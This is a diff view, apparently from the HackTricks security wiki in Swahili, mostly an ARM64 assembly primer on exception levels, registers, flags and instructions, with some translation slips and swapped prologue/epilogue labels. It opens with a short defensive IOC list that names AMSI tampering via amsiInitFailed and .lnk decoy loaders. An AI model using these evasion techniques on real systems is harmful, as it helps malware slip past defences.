../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
{{#endref}}
Hunting/IOCs
- ZIP files zenye kamba ya alama ya ASCII (e.g., xFIQCV) iliyoongezwa kwenye data ya archive.
- .lnk inayoorodhesha folda za mzazi/mtumiaji ili kupata ZIP na kufungua nyaraka ya kudanganya.
- Kuchezewa kwa AMSI kupitia [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Nyuzi za biashara zinazodumu muda mrefu zikimalizika kwa viungo vinavyoandikwa chini ya vikoa vya PaaS vinavyoaminika.
- ZIP files containing the ASCII marker string (e.g., xFIQCV) appended to the archive data.
- .lnk that enumerates parent/user folders to locate the ZIP and opens a decoy document.
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Long-running business threads ending with links hosted under trusted PaaS domains.
## References

564
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

481
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
View File

@ -1,204 +1,207 @@
# Utangulizi wa ARM64v8
# Utangulizi kwa ARM64v8
{{#include ../../../banners/hacktricks-training.md}}
## **Viwango vya Kigezo - EL (ARM64v8)**
## **Ngazi za Isipokuwa - EL (ARM64v8)**
Katika usanifu wa ARMv8, viwango vya utekelezaji, vinavyojulikana kama Viwango vya Kigezo (ELs), vin定义 kiwango cha ruhusa na uwezo wa mazingira ya utekelezaji. Kuna viwango vinne vya kigezo, kuanzia EL0 hadi EL3, kila kimoja kikihudumia kusudi tofauti:
Katika usanifu wa ARMv8, viwango vya utekelezaji, vinavyojulikana kama Exception Levels (ELs), vinafafanua kiwango cha ruhusa na uwezo wa mazingira ya utekelezaji. Kuna viwango vinne vya exception, vinavyoanzia EL0 hadi EL3, kila kimoja kikiwa na kusudi tofauti:
1. **EL0 - Hali ya Mtumiaji**:
- Hiki ndicho kiwango chenye ruhusa ndogo zaidi na kinatumika kwa kutekeleza msimbo wa programu za kawaida.
- Programu zinazotembea kwenye EL0 zimejitengea kutoka kwa kila mmoja na kutoka kwa programu za mfumo, kuimarisha usalama na utulivu.
2. **EL1 - Hali ya Kernel ya Mfumo wa Uendeshaji**:
- Makaratasi mengi ya mifumo ya uendeshaji yanakimbia kwenye kiwango hiki.
- EL1 ina ruhusa zaidi kuliko EL0 na inaweza kufikia rasilimali za mfumo, lakini kwa vizuizi fulani ili kuhakikisha uadilifu wa mfumo.
3. **EL2 - Hali ya Hypervisor**:
- Kiwango hiki kinatumika kwa uhalisia. Hypervisor inayokimbia kwenye EL2 inaweza kusimamia mifumo mingi ya uendeshaji (kila moja katika EL1 yake) inayokimbia kwenye vifaa vya kimwili sawa.
- EL2 inatoa vipengele vya kutenganisha na kudhibiti mazingira yaliyohalalishwa.
4. **EL3 - Hali ya Msimamizi Salama**:
- Hiki ndicho kiwango chenye ruhusa kubwa zaidi na mara nyingi kinatumika kwa kuanzisha salama na mazingira ya utekelezaji yaliyoaminika.
- EL3 inaweza kusimamia na kudhibiti upatikanaji kati ya hali salama na zisizo salama (kama vile kuanzisha salama, OS iliyoaminika, n.k.).
1. **EL0 - User Mode**:
- Hii ni ngazi yenye ruhusa kidogo na hutumika kwa kutekeleza msimbo wa programu za kawaida.
- Programu zinazofanya kazi katika EL0 zimepangwa kutengwa kutoka kwa kila mmoja na kutoka kwa programu za mfumo, kuweka usalama na utulivu.
2. **EL1 - Operating System Kernel Mode**:
- Mengine ya kernels ya mfumo wa uendeshaji yanatumia ngazi hii.
- EL1 ina ruhusa zaidi kuliko EL0 na inaweza kufikia rasilimali za mfumo, lakini kwa vizuizi fulani kuhakikisha uadilifu wa mfumo.
3. **EL2 - Hypervisor Mode**:
- Ngazi hii hutumika kwa virtualizaton. Hypervisor inayoendesha katika EL2 inaweza kusimamia mifumo mingi ya uendeshaji (kila moja katika EL1 yake) ikifanya kazi kwenye vifaa hivyo vya kimwili.
- EL2 hutoa vipengele vya kutengwa na udhibiti wa mazingira yaliyo virtualized.
4. **EL3 - Secure Monitor Mode**:
- Hii ni ngazi yenye ruhusa zaidi na mara nyingi hutumika kwa secure booting na trusted execution environments.
- EL3 inaweza kusimamia na kudhibiti ufikiaji kati ya hali salama na zisizo salama (kama secure boot, trusted OS, n.k).
Matumizi ya viwango hivi yanaruhusu njia iliyopangwa na salama ya kusimamia vipengele tofauti vya mfumo, kutoka kwa programu za mtumiaji hadi programu za mfumo zenye ruhusa kubwa zaidi. Mbinu ya ARMv8 kuhusu viwango vya ruhusa inasaidia katika kutenganisha kwa ufanisi vipengele tofauti vya mfumo, hivyo kuimarisha usalama na uimara wa mfumo.
Matumizi ya ngazi hizi yanaruhusu njia iliyopangwa na salama ya kusimamia nyanja tofauti za mfumo, kutoka kwa programu za watumiaji hadi programu za mfumo zenye ruhusa nyingi. Njia ya ARMv8 kuhusu viwango vya ruhusa husaidia kutenganisha vipengele tofauti vya mfumo kwa ufanisi, hivyo kuongeza usalama na uimara wa mfumo.
## **Register (ARM64v8)**
## **Virejista (ARM64v8)**
ARM64 ina **register 31 za matumizi ya jumla**, zilizoandikwa `x0` hadi `x30`. Kila moja inaweza kuhifadhi thamani ya **64-bit** (8-byte). Kwa operesheni zinazohitaji tu thamani za 32-bit, register hizo hizo zinaweza kufikiwa katika hali ya 32-bit kwa kutumia majina w0 hadi w30.
ARM64 ina **virejista 31 za madhumuni ya jumla**, zinazoandikwa `x0` hadi `x30`. Kila moja inaweza kuhifadhi thamani ya **64-bit** (8-byte). Kwa operesheni zinazohitaji thamani za 32-bit pekee, virejista hivyo vinaweza kufikiwa katika modi ya 32-bit kwa kutumia majina `w0` hadi `w30`.
1. **`x0`** hadi **`x7`** - Hizi kwa kawaida hutumiwa kama register za scratch na kwa kupitisha vigezo kwa subroutines.
- **`x0`** pia hubeba data ya kurudi ya kazi
2. **`x8`** - Katika kernel ya Linux, `x8` inatumika kama nambari ya wito wa mfumo kwa amri ya `svc`. **Katika macOS x16 ndiyo inayotumika!**
3. **`x9`** hadi **`x15`** - Register zaidi za muda, mara nyingi hutumiwa kwa mabadiliko ya ndani.
4. **`x16`** na **`x17`** - **Register za Wito wa Ndani**. Register za muda kwa thamani za papo hapo. Pia zinatumika kwa wito wa kazi zisizo za moja kwa moja na PLT (Jedwali la Uunganisho wa Utaratibu).
- **`x16`** inatumika kama **nambari ya wito wa mfumo** kwa amri ya **`svc`** katika **macOS**.
5. **`x18`** - **Register ya Jukwaa**. Inaweza kutumika kama register ya matumizi ya jumla, lakini kwenye baadhi ya majukwaa, register hii imehifadhiwa kwa matumizi maalum ya jukwaa: Kielelezo cha block ya mazingira ya thread ya sasa katika Windows, au kuonyesha muundo wa kazi inayotekelezwa sasa katika kernel ya linux.
6. **`x19`** hadi **`x28`** - Hizi ni register zilizohifadhiwa na mteja. Kazi lazima ihifadhi thamani za register hizi kwa mwito wake, hivyo zinahifadhiwa kwenye stack na kurejeshwa kabla ya kurudi kwa mwito.
7. **`x29`** - **Pointer ya Frame** ili kufuatilia frame ya stack. Wakati frame mpya ya stack inaundwa kwa sababu kazi inaitwa, register ya **`x29`** inahifadhiwa kwenye stack na anwani ya **pointer mpya** ya frame ni (**anwani ya `sp`**) inahifadhiwa katika register hii.
- Register hii inaweza pia kutumika kama **register ya matumizi ya jumla** ingawa kwa kawaida hutumiwa kama rejeleo kwa **mabadiliko ya ndani**.
8. **`x30`** au **`lr`**- **Register ya Kiungo**. Inashikilia **anwani ya kurudi** wakati amri ya `BL` (Tawi na Kiungo) au `BLR` (Tawi na Kiungo kwa Register) inatekelezwa kwa kuhifadhi thamani ya **`pc`** katika register hii.
- Inaweza pia kutumika kama register nyingine yoyote.
- Ikiwa kazi ya sasa inakwenda kuita kazi mpya na hivyo kuandika `lr`, itahifadhiwa kwenye stack mwanzoni, hii ni epilogue (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> Hifadhi `fp` na `lr`, tengeneza nafasi na pata `fp` mpya) na kurejeshwa mwishoni, hii ni prologue (`ldp x29, x30, [sp], #48; ret` -> Rejesha `fp` na `lr` na rudi).
9. **`sp`** - **Pointer ya Stack**, inatumika kufuatilia kilele cha stack.
- thamani ya **`sp`** inapaswa kuwekwa kuwa angalau **quadword** **mwelekeo** au mwelekeo wa makosa unaweza kutokea.
10. **`pc`** - **Kikundi cha Programu**, ambacho kinaelekeza kwenye amri inayofuata. Register hii inaweza kusasishwa tu kupitia uzalishaji wa makosa, marejeo ya makosa, na matawi. Amri pekee za kawaida zinazoweza kusoma register hii ni amri za tawi na kiungo (BL, BLR) kuhifadhi anwani ya **`pc`** katika **`lr`** (Register ya Kiungo).
11. **`xzr`** - **Register ya Sifuri**. Pia inaitwa **`wzr`** katika fomu yake ya register ya **32**-bit. Inaweza kutumika kupata thamani ya sifuri kwa urahisi (operesheni ya kawaida) au kufanya kulinganisha kwa kutumia **`subs`** kama **`subs XZR, Xn, #10`** ikihifadhi data inayotokana mahali popote (katika **`xzr`**).
1. **`x0`** hadi **`x7`** - Hizi kawaida hutumika kama virejista vya muda na kwa kupitisha vigezo kwa subroutines.
- **`x0`** pia hubeba data za kurudi za function
2. **`x8`** - Katika kernel ya Linux, `x8` hutumika kama nambari ya system call kwa maelekezo ya `svc`. **Katika macOS x16 ndilo linalotumika!**
3. **`x9`** hadi **`x15`** - Virejista vingine vya muda, mara nyingi hutumika kwa vigezo vya ndani.
4. **`x16`** na **`x17`** - **Intra-procedural Call Registers**. Virejista vya muda kwa thamani za papo hapo. Pia hutumika kwa mifumo ya kuita function isiyo ya moja kwa moja na PLT stubs.
- **`x16`** hutumika kama **nambari ya system call** kwa maelekezo ya **`svc`** katika **macOS**.
5. **`x18`** - **Platform register**. Inaweza kutumika kama rejista ya madhumuni ya jumla, lakini kwenye baadhi ya majukwaa, rejista hii imehifadhiwa kwa matumizi maalum ya jukwaa: Pointer kwa current thread environment block katika Windows, au kuashiria structure ya kazi inayotekelezwa sasa katika linux kernel.
6. **`x19`** hadi **`x28`** - Hizi ni virejista vinavyohifadhiwa na callee. Function lazima ihifadhi thamani za virejista hivi kwa caller wake, kwa hivyo zinahifadhiwa kwenye stack na kurejeshwa kabla ya kurudi kwa caller.
7. **`x29`** - **Frame pointer** ya kufuatilia fremu ya stack. Wakati fremu mpya ya stack inaundwa kwa sababu function imeitwa, rejista ya **`x29`** **inahifadhiwa kwenye stack** na anwani ya frame mpya (aniwani ya **`sp`**) **inahifadhiwa katika rejista hii**.
- Rejista hii pia inaweza kutumika kama **rejista ya madhumuni ya jumla** ingawa kawaida hutumika kama rejea kwa **vigezo vya ndani**.
8. **`x30`** au **`lr`**- **Link register**. Inashikilia **anwani ya kurudi** wakati maelekezo `BL` (Branch with Link) au `BLR` (Branch with Link to Register) yanatekelezwa kwa kuhifadhi thamani ya **`pc`** katika rejista hii.
- Pia inaweza kutumika kama rejista nyingine yoyote.
- Ikiwa function ya sasa itaaita function mpya na kwa hivyo kuandika juu `lr`, itaihifadhi kwenye stack mwanzoni, hii ni epilogue (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> Hifadhi `fp` na `lr`, tengeneza nafasi na pata `fp` mpya) na kuirejesha mwishoni, hii ni prologue (`ldp x29, x30, [sp], #48; ret` -> Rejesha `fp` na `lr` na rudi).
9. **`sp`** - **Stack pointer**, hutumika kufuatilia kilele cha stack.
- thamani ya **`sp`** inapaswa kuwekwa daima kwa angalau **quadword** **alignment** au kosa la alignment linaweza kutokea.
10. **`pc`** - **Program counter**, inayoashiria maelekezo yajayo. Rejista hii inaweza tu kusasishwa kupitia uzalishaji wa exception, kurudi kwa exception, na branches. Maelekezo ya kawaida pekee yanayoweza kusoma rejista hii ni yale ya branch with link (BL, BLR) kuhifadhi anwani ya **`pc`** katika **`lr`** (Link Register).
11. **`xzr`** - **Zero register**. Inajulikana pia kama **`wzr`** katika umbo lake la **32**-bit. Inaweza kutumika kupata thamani ya sifuri kwa urahisi (operesheni ya kawaida) au kufanya kulinganisha kwa kutumia **`subs`** kama **`subs XZR, Xn, #10`** bila kuhifadhi matokeo mahali (katika **`xzr`**).
Register za **`Wn`** ni toleo la **32bit** la register za **`Xn`**.
Virejista vya **`Wn`** ni toleo la **32bit** la rejista za **`Xn`**.
### SIMD na Register za Pointi za Kuogelea
> [!TIP]
> Virejista kutoka X0 - X18 ni volatile, ambayo ina maana thamani zao zinaweza kubadilika kwa wito za function na interrupts. Hata hivyo, virejista kutoka X19 - X28 ni non-volatile, zinamaanisha thamani zao lazima zihifadhiwe kupitia wito za function ("callee saved").
Zaidi ya hayo, kuna register nyingine **32 za urefu wa 128bit** ambazo zinaweza kutumika katika operesheni za optimized single instruction multiple data (SIMD) na kwa kufanya hesabu za pointi za kuogelea. Hizi zinaitwa register za Vn ingawa zinaweza pia kufanya kazi katika **64**-bit, **32**-bit, **16**-bit na **8**-bit na kisha zinaitwa **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** na **`Bn`**.
### Virejista za SIMD na Floating-Point
### Register za Mfumo
Zaidi ya hayo, kuna **virejista 32 za urefu wa 128bit** ambazo zinaweza kutumika katika operesheni za optimized single instruction multiple data (SIMD) na kwa kuendesha hesabu za floating-point. Hizi zinaitwa Vn ingawa zinaweza pia kufanya kazi katika **64**-bit, **32**-bit, **16**-bit na **8**-bit na wakati huo zinaitwa **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** na **`Bn`**.
**Kuna mamia ya register za mfumo**, pia zinazoitwa register za matumizi maalum (SPRs), zinatumika kwa **kuangalia** na **kudhibiti** tabia za **processors**.\
Zinaweza kusomwa au kuwekwa tu kwa kutumia amri maalum iliyotengwa **`mrs`** na **`msr`**.
### Virejista vya Mfumo
Register maalum **`TPIDR_EL0`** na **`TPIDDR_EL0`** mara nyingi hupatikana wakati wa uhandisi wa kurudi. Kiambishi cha `EL0` kinaonyesha **kigezo kidogo** ambacho register inaweza kufikiwa (katika kesi hii EL0 ni kiwango cha kawaida cha kigezo (ruhusa) ambacho programu za kawaida zinakimbia).\
Mara nyingi hutumiwa kuhifadhi **anwani ya msingi ya eneo la uhifadhi wa thread-local** la kumbukumbu. Kwa kawaida ya kwanza inaweza kusomwa na kuandikwa kwa programu zinazokimbia katika EL0, lakini ya pili inaweza kusomwa kutoka EL0 na kuandikwa kutoka EL1 (kama kernel).
**Kuna mamia ya system registers**, pia zinazoitwa special-purpose registers (SPRs), zinatumiwa kwa **kusimamia** na **kudhibiti** tabia za **processors**.\
Zinaweza kusomwa au kuandikwa tu kwa kutumia maelekezo maalum ya `mrs` na `msr`.
- `mrs x0, TPIDR_EL0 ; Soma TPIDR_EL0 ndani ya x0`
- `msr TPIDR_EL0, X0 ; Andika x0 ndani ya TPIDR_EL0`
Virejista maalum **`TPIDR_EL0`** na **`TPIDDR_EL0`** mara nyingi hupatikana wakati wa reversing engineering. Kiambishi `EL0` kinaonyesha **ngazi ndogo kabisa ya exception** ambayo rejista inaweza kufikiwa kutoka (katika kesi hii EL0 ni kiwango cha kawaida (privilege) ambacho programu za kawaida zinafanya kazi kwa).\
Mara nyingi hutumika kuhifadhi **anwani ya msingi ya eneo la thread-local storage** la kumbukumbu. Kwa kawaida ya kwanza inasomeka na kuandikwa kwa programu zinazoendesha katika EL0, lakini ya pili inaweza kusomwa kutoka EL0 na kuandikwa kutoka EL1 (kama kernel).
- `mrs x0, TPIDR_EL0 ; Read TPIDR_EL0 into x0`
- `msr TPIDR_EL0, X0 ; Write x0 into TPIDR_EL0`
### **PSTATE**
**PSTATE** ina vipengele kadhaa vya mchakato vilivyopangwa katika register maalum inayoweza kuonekana na mfumo wa uendeshaji **`SPSR_ELx`**, X ikiwa ni **kiwango cha ruhusa** **cha kigezo** kilichosababisha (hii inaruhusu kurejesha hali ya mchakato wakati kigezo kinamalizika).\
Hizi ndizo sehemu zinazoweza kufikiwa:
**PSTATE** ina vipengele kadhaa vya mchakato vilivyopangwa ndani ya rejista maalum inayoonekana kwa mfumo wa uendeshaji `SPSR_ELx`, ambapo X ni **ngazi ya ruhusa ya exception** iliyosababisha (hii inaruhusu kurejesha hali ya mchakato wakati exception inapoisha).\
Hivi ndivyo vitu vinavyopatikana:
<figure><img src="../../../images/image (1196).png" alt=""><figcaption></figcaption></figure>
- Bendera za hali **`N`**, **`Z`**, **`C`** na **`V`**:
- **`N`** inamaanisha operesheni ilizalisha matokeo hasi
- **`Z`** inamaanisha operesheni ilizalisha sifuri
- **`C`** inamaanisha operesheni ilibeba
- **`V`** inamaanisha operesheni ilizalisha overflow iliyosainiwa:
- Jumla ya nambari mbili chanya inazalisha matokeo hasi.
- Jumla ya nambari mbili hasi inazalisha matokeo chanya.
- Katika utofauti, wakati nambari kubwa hasi inatolewa kutoka kwa nambari ndogo chanya (au kinyume chake), na matokeo hayawezi kuwakilishwa ndani ya upeo wa ukubwa wa bit uliopewa.
- Kwa wazi processor haijui operesheni hiyo ina saini au la, hivyo itakagua C na V katika operesheni na kuashiria ikiwa kubeba kumetokea katika kesi ilikuwa ya saini au isiyo ya saini.
- Bendera za hali (**`N`**, **`Z`**, **`C`** na **`V`**):
- **`N`** ina maana operesheni ilileta matokeo hasi
- **`Z`** ina maana operesheni ilileta sifuri
- **`C`** ina maana operesheni ilibeba (carry)
- **`V`** ina maana operesheni ilisababisha overflow iliyo na saini:
- Jumla ya nambari mbili chanya inaleta matokeo hasi.
- Jumla ya nambari mbili hasi inaleta matokeo chanya.
- Katika utofauti, wakati nambari hasi kubwa inaanzishwa kutoka kwa nambari chanya ndogo (au kinyume), na matokeo hayawezi kuwakilishwa ndani ya ukubwa wa biti uliotolewa.
- Kwa wazi processor haitambui kama operesheni ni yenye saini au la, kwa hivyo itacheki C na V katika operesheni na kuonyesha kama carry ilitokea ikiwa ilikuwa iliyo na saini au isiyo na saini.
> [!WARNING]
> Si amri zote zinazosasisha bendera hizi. Baadhi kama **`CMP`** au **`TST`** hufanya hivyo, na nyingine ambazo zina kiambishi cha s kama **`ADDS`** pia hufanya hivyo.
> Si maelekezo yote yanasasisha bendera hizi. Baadhi kama **`CMP`** au **`TST`** hufanya, na mengine yenye nyongeza `s` kama **`ADDS`** pia hufanya.
- Bendera ya **upana wa sasa wa register (`nRW`)**: Ikiwa bendera ina thamani 0, programu itakimbia katika hali ya utekelezaji ya AArch64 mara itakaporejeshwa.
- **Kiwango cha Kigezo** (**`EL`**): Programu ya kawaida inayokimbia katika EL0 itakuwa na thamani 0
- Bendera ya **kuangalia moja** (**`SS`**): Inatumika na debuggers kuangalia moja kwa moja kwa kuweka bendera ya SS kuwa 1 ndani ya **`SPSR_ELx`** kupitia kigezo. Programu itakimbia hatua moja na kutoa kigezo cha hatua moja.
- Bendera ya hali ya **kigezo kisichofaa** (**`IL`**): Inatumika kuashiria wakati programu yenye ruhusa inafanya uhamisho wa kiwango cha kigezo kisichofaa, bendera hii inawekwa kuwa 1 na processor inasababisha kigezo kisichofaa.
- Bendera za **`DAIF`**: Bendera hizi zinaruhusu programu yenye ruhusa kuchuja kwa hiari kigezo fulani za nje.
- Ikiwa **`A`** ni 1 inamaanisha **kuondolewa kwa asynchronous** kutasababisha. **`I`** inasanidiwa kujibu **Maombi ya Interrupts ya vifaa vya nje** (IRQs). na F inahusiana na **Maombi ya Interrupts ya Haraka** (FIRs).
- Bendera za **uchaguzi wa pointer ya stack** (**`SPS`**): Programu zenye ruhusa zinazokimbia katika EL1 na juu zinaweza kubadilisha kati ya kutumia register yao ya pointer ya stack na ile ya mtumiaji (k.m. kati ya `SP_EL1` na `EL0`). Kubadilisha hii inafanywa kwa kuandika kwenye register maalum ya **`SPSel`**. Hii haiwezi kufanywa kutoka EL0.
- Bendera ya sasa ya **upana wa rejista (`nRW`)**: Ikiwa bendera ina thamani 0, programu itaendesha katika state ya AArch64 mara itakayorejeshwa.
- **Ngazi ya Exception** ya sasa (**`EL`**): Programu ya kawaida inayofanya kazi katika EL0 itakuwa na thamani 0
- Bendera ya **single stepping** (**`SS`**): Inatumika na debuggers kufanya hatua kwa hatua kwa kuweka bendera SS kuwa 1 ndani ya `SPSR_ELx` kupitia exception. Programu itaendesha hatua moja na kutoa exception ya single step.
- Bendera ya hali ya **illegal exception** (**`IL`**): Inatumika kumarka wakati programu ya mwenye ruhusa inafanya uhamisho wa ngazi ya exception usio halali, bendera hii inawekwa kuwa 1 na processor itasababisha exception ya hali isiyo halali.
- Bendera za **`DAIF`**: Bendera hizi zinamruhusu programu yenye ruhusa kuzima kwa namna chaguo fulani exceptions za nje.
- Ikiwa **`A`** ni 1 ina maana **asynchronous aborts** zitasababisha. **`I`** inasanidiwa kujibu External hardware **Interrupt Requests** (IRQs). na F inahusiana na **Fast Interrupt Requests** (FIRs).
- Bendera za kuchagua stack pointer (**`SPS`**): Programu zenye ruhusa zinazoendesha katika EL1 na juu zinaweza kubadilisha kati ya kutumia rejista yao ya stack pointer na ile ya mtindo wa mtumiaji (mfano kati ya `SP_EL1` na `EL0`). Mabadiliko haya hufanywa kwa kuandika kwenye rejista maalum `SPSel`. Hii haiwezi kufanyika kutoka EL0.
## **Mkataba wa Wito (ARM64v8)**
## **Calling Convention (ARM64v8)**
Mkataba wa wito wa ARM64 unasisitiza kwamba **vigezo vinane vya kwanza** kwa kazi vinapitishwa katika register **`x0` hadi `x7`**. **Vigezo** vya ziada vinapitishwa kwenye **stack**. Thamani ya **kurudi** inarudishwa katika register **`x0`**, au katika **`x1`** pia **ikiwa ni 128 bits ndefu**. Register za **`x19`** hadi **`x30`** na **`sp`** lazima **zihifadhiwe** kati ya wito wa kazi.
Mkataba wa kupiga simu wa ARM64 unaelekeza kuwa **vigezo vinane vya kwanza** kwa function hupitishwa katika virejista **`x0` kupitia `x7`**. Vigezo **vilivyozidi** hupitishwa kwenye **stack**. Thamani ya **kurudi** inarudishwa katika rejista **`x0`**, au katika **`x1`** pia **ikiwa ni 128 bits ndefu**. Virejista **`x19`** hadi **`x30`** na **`sp`** vinapaswa **kuhifadhiwa** kupitia wito za function.
Wakati wa kusoma kazi katika assembly, angalia **prologue na epilogue ya kazi**. **Prologue** kwa kawaida inahusisha **kuhifadhi pointer ya frame (`x29`)**, **kuweka** pointer mpya ya frame, na **kuandaa nafasi ya stack**. **Epilogue** kwa kawaida inahusisha **kurejesha pointer ya frame iliyohifadhiwa** na **kurudi** kutoka kwa kazi.
Wakati unasoma function katika assembly, tafuta **prologue** na **epilogue** ya function. **Prologue** kawaida inajumuisha **kuhifadhi frame pointer (`x29`)**, **kuweka** frame pointer mpya, na **kutenga nafasi ya stack**. **Epilogue** kawaida inajumuisha **kurejesha frame pointer iliyohifadhiwa** na **kurudi** kutoka kwenye function.
### Mkataba wa Wito katika Swift
### Calling Convention in Swift
Swift ina **mkataba wake wa wito** ambao unaweza kupatikana katika [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64)
Swift ina **calling convention** yake ambayo inaweza kupatikana katika [**https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64**](https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64)
## **Amri za Kawaida (ARM64v8)**
## **Maagizo ya Kawaida (ARM64v8)**
Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opcode`** ni **operesheni** inayopaswa kufanywa (kama `add`, `sub`, `mov`, n.k.), **`dst`** ni **register ya marudio** ambapo matokeo yatahifadhiwa, na **`src1`** na **`src2`** ni **register za chanzo**. Thamani za papo hapo zinaweza pia kutumika badala ya register za chanzo.
Maelekezo ya ARM64 kwa ujumla yana muundo wa **`opcode dst, src1, src2`**, ambapo **`opcode`** ni **operesheni** itakayotekelezwa (kama `add`, `sub`, `mov`, n.k.), **`dst`** ni rejista ya **lengo** ambapo matokeo yatahifadhiwa, na **`src1`** na **`src2`** ni **vyanzo**. Thamani za papo hapo zinaweza pia kutumika badala ya virejista vya chanzo.
- **`mov`**: **Hamisha** thamani kutoka register moja hadi nyingine.
- **`mov`**: **Hamisha** thamani kutoka rejista moja hadi nyingine.
- Mfano: `mov x0, x1` — Hii inahamisha thamani kutoka `x1` hadi `x0`.
- **`ldr`**: **Pakia** thamani kutoka **kumbukumbu** hadi **register**.
- Mfano: `ldr x0, [x1]` — Hii inapakua thamani kutoka eneo la kumbukumbu lililoonyeshwa na `x1` hadi `x0`.
- **Hali ya Offset**: Offset inayohusisha kiashiria cha asili inaonyeshwa, kwa mfano:
- `ldr x2, [x1, #8]`, hii itapakia katika x2 thamani kutoka x1 + 8
- `ldr x2, [x0, x1, lsl #2]`, hii itapakia katika x2 kitu kutoka kwenye array x0, kutoka kwenye nafasi x1 (index) \* 4
- **Hali ya Pre-indexed**: Hii itatumia hesabu kwa asili, kupata matokeo na pia kuhifadhi asili mpya katika asili.
- **`ldr`**: **Pakia** thamani kutoka **kumbukumbu** hadi **rejista**.
- Mfano: `ldr x0, [x1]` — Hii inapakia thamani kutoka eneo la kumbukumbu linaloashiriwa na `x1` ndani ya `x0`.
- **Modo ya offset**: Offset inayoathiri pointer ya asili inaonyeshwa, kwa mfano:
- `ldr x2, [x1, #8]`, hii itapakia ndani ya x2 thamani kutoka x1 + 8
- `ldr x2, [x0, x1, lsl #2]`, hii itapakia ndani ya x2 kitu kutoka safu x0, kutoka nafasi x1 (index) * 4
- **Modo ya pre-indexed**: Hii itafanya hesabu kwa asili, kupata matokeo na pia kuhifadhi asili mpya katika asili.
- `ldr x2, [x1, #8]!`, hii itapakia `x1 + 8` katika `x2` na kuhifadhi katika x1 matokeo ya `x1 + 8`
- `str lr, [sp, #-4]!`, Hifadhi register ya kiungo katika sp na sasisha register sp
- **Hali ya Post-index**: Hii ni kama ile ya awali lakini anwani ya kumbukumbu inafikiwa na kisha offset inakokotwa na kuhifadhiwa.
- `str lr, [sp, #-4]!`, Hifadhi link register katika sp na sasisha rejista sp
- **Modo ya post-index**: Hii ni kama ile ya hapo juu lakini anwani ya kumbukumbu inafikiwa kisha offset inahesabiwa na kuhifadhiwa.
- `ldr x0, [x1], #8`, pakia `x1` katika `x0` na sasisha x1 na `x1 + 8`
- **Uelekeo wa PC-relative**: Katika kesi hii anwani ya kupakia inakokotwa kulingana na register ya PC
- `ldr x1, =_start`, Hii itapakia anwani ambapo alama ya `_start` inaanza katika x1 inayohusiana na PC ya sasa.
- **`str`**: **Hifadhi** thamani kutoka **register** hadi **kumbukumbu**.
- Mfano: `str x0, [x1]` — Hii inahifadhi thamani katika `x0` kwenye eneo la kumbukumbu lililoonyeshwa na `x1`.
- **`ldp`**: **Pakia Jozi za Register**. Amri hii **inapakia register mbili** kutoka **sehemu za kumbukumbu** zinazofuatana. Anwani ya kumbukumbu kwa kawaida inaundwa kwa kuongeza offset kwa thamani katika register nyingine.
- Mfano: `ldp x0, x1, [x2]` — Hii inapakua `x0` na `x1` kutoka maeneo ya kumbukumbu katika `x2` na `x2 + 8`, mtawalia.
- **`stp`**: **Hifadhi Jozi za Register**. Amri hii **inahifadhi register mbili** kwenye **sehemu za kumbukumbu** zinazofuatana. Anwani ya kumbukumbu kwa kawaida inaundwa kwa kuongeza offset kwa thamani katika register nyingine.
- **PC-relative addressing**: Katika kesi hii anwani ya kupakia huhesabiwa kwa uhusiano na rejista pc
- `ldr x1, =_start`, Hii itapakia anwani ambapo alama `_start` inaanza katika x1 kuhusiana na PC ya sasa.
- **`str`**: **Hifadhi** thamani kutoka **rejista** hadi **kumbukumbu**.
- Mfano: `str x0, [x1]` — Hii inahifadhi thamani ya `x0` katika eneo la kumbukumbu linaloashiriwa na `x1`.
- **`ldp`**: **Load Pair of Registers**. Maelekezo haya **hupanua vifungo viwili** kutoka **eneo la kumbukumbu linaloendelea**. Anwani ya kumbukumbu kwa kawaida inaundwa kwa kuongeza offset kwa thamani katika rejista nyingine.
- Mfano: `ldp x0, x1, [x2]` — Hii inapakia `x0` na `x1` kutoka maeneo ya kumbukumbu katika `x2` na `x2 + 8`, mtawalia.
- **`stp`**: **Store Pair of Registers**. Amri hii **inahifadhi rejista mbili** kwa **maeneo ya kumbukumbu yanayofuata**. Anwani ya kumbukumbu kwa kawaida inaundwa kwa kuongeza offset kwa thamani katika rejista nyingine.
- Mfano: `stp x0, x1, [sp]` — Hii inahifadhi `x0` na `x1` kwenye maeneo ya kumbukumbu katika `sp` na `sp + 8`, mtawalia.
- `stp x0, x1, [sp, #16]!` — Hii inahifadhi `x0` na `x1` kwenye maeneo ya kumbukumbu katika `sp+16` na `sp + 24`, mtawalia, na sasisha `sp` na `sp+16`.
- **`add`**: **Ongeza** thamani za register mbili na uhifadhi matokeo katika register.
- `stp x0, x1, [sp, #16]!` — Hii inahifadhi `x0` na `x1` kwenye maeneo ya kumbukumbu katika `sp+16` na `sp + 24`, mtawalia, na inasasisha `sp` kuwa `sp+16`.
- **`add`**: **Ongeza** thamani za virejista viwili na hifadhi matokeo katika rejista.
- Sintaksia: add(s) Xn1, Xn2, Xn3 | #imm, \[shift #N | RRX]
- Xn1 -> Marudio
- Xn2 -> Operandi 1
- Xn3 | #imm -> Operandi 2 (register au papo hapo)
- \[shift #N | RRX] -> Fanya shift au piga RRX
- Mfano: `add x0, x1, x2` — Hii inaongeza thamani katika `x1` na `x2` pamoja na kuhifadhi matokeo katika `x0`.
- `add x5, x5, #1, lsl #12` — Hii inalingana na 4096 (1 shifter mara 12) -> 1 0000 0000 0000 0000
- **`adds`** Hii inafanya `add` na inasasisha bendera
- **`sub`**: **Punguza** thamani za register mbili na uhifadhi matokeo katika register.
- Angalia **`add`** **sintaksia**.
